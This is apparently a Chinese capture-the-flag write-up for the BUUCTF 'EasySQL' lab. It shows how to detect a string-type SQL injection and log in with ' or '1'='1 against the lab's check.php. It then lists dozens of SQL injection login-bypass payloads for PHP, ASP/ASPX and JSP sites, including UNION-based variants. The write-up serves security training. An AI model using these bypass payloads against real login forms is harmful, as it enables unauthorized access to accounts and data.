知识点

  • sql注入
  • 万能密码登录

启动靶机

启动靶机,查看题目
image.png页面有输入框,且题目为EasySQL,SQL注入无疑了。尝试登陆:
image.png
登陆失败,通过 ‘ 判断原SQL语句闭合类型,得到报错信息:
image.png
其中包含数据库信息MariaDB以及闭合类型为字符型,尝试万能密码登陆。

  1. ' or '1'='1

最终payload

  1. http://07f5c249-6491-43d7-988e-7c7865f821bb.node4.buuoj.cn/check.php?username=1' or '1'='1&password=1' or '1'='1

PS:用户框和密码框都需要万能密码,可能用户名验证和密码验证没有在一条sql语句中
image.png

万能密码表

PHP

  1. 'or 1=1/*
  2. "or "a"="a
  3. "or 1=1--
  4. "or"="
  5. "or"="a'='a
  6. "or1=1--
  7. "or=or"
  8. ''or'='or'
  9. ') or ('a'='a
  10. '.).or.('.a.'='.a
  11. 'or 1=1
  12. 'or 1=1--
  13. 'or 1=1/*
  14. 'or"="a'='a
  15. 'or' '1'='1'
  16. 'or''='
  17. 'or''=''or''='
  18. 'or'='1'
  19. 'or'='or'
  20. 'or.'a.'='a
  21. 'or1=1--
  22. 1'or'1'='1
  23. a'or' 1=1--
  24. a'or'1=1--
  25. or 'a'='a'
  26. or 1=1--
  27. or1=1--

asp/aspx

  1. "or "a"="a
  2.  ')or('a'='a
  3. '.).or.('.a.'='.a
  4. or 1=1--
  5. 'or 1=1--
  6. a'or' 1=1--
  7. "or 1=1--
  8. 'or'a'='a
  9. 'or.'a.'='a
  10. "or"="a'='a
  11. 'or''='
  12. or'='or'
  13. 1 or '1'='1'=1
  14. 1 or '1'='1' or 1=1
  15. 'OR 1=1%00
  16. "or 1=1%00
  17. 'xor
  19. 新型万能登陆密码:
  20.     用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin
  21.     密码 1
  23.     Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
  24.     Password=1
  26.     ..admin' or 'a'='a 密码随便

jsp

  1. 1'or'1'='1
  2. admin' or 1=1/*